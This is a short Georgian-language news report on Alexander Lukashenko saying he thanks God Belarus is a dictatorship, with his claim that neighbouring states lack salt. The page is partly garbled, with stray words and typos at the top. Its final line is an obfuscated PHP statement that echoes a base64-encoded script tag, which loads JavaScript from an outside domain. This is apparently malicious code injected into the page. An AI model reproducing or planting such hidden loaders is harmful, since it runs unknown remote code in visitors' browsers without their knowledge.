celsiusi
ავერსი შნაიდერი
ბელარუსის პრეზიდენტინ ალექსანდრე ლუკაშენკო ღმერთს მადლობას უხდის იმისთვის, რომ ბელარუსში დიქტატურაა. ამის შესახებ მაბნ ქალაქ ჩეჩერსკში, მოსახლეობასთან შეხვედრისას განაცხადა. 
 
ლუკაშენკოს მტკიცებით, ბელარუსის მოსაზღვრე ლიეტუვას, ლატვიასა და პოლონეთს “მარილი არ აქვთ” და თავიანთ მოქალაქეებს ბელარუსში არ უშვებენ იმისათვის, რომ იქ იყიდონ აღნიშნული პროდუქტი.
 
“ესაა მთელი დემოკრატია! მადლობა ღმერთს, დიქტატურა გვაქვს. თქვენ სულ მაკრიტიკებთ: დიქტატურა, დიქტატურა… მაგრამ ამ დიქტატურაში წესრიგია. დიქტატურა რომ არ იყოს, შიშვლები ვიქნებოდით”, - ციტირებს ლუკაშენკოს ბელარუსის სახელმწიფო სააგენტო “ბელტა”.
 
შეგახსენებთ, რომ 28 წელია, ალექსანდრე ლუკაშენკო ბელარუსს მართავს. ხელისუფლებამ ძალადობით უპასუხა 2020 წელს, საპრეზიდენტო არჩევნების შემდგომ გამართულ უპრეცედენტო დემონსტრაციებს ლუკაშენკოს წინააღმდეგ.
743
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");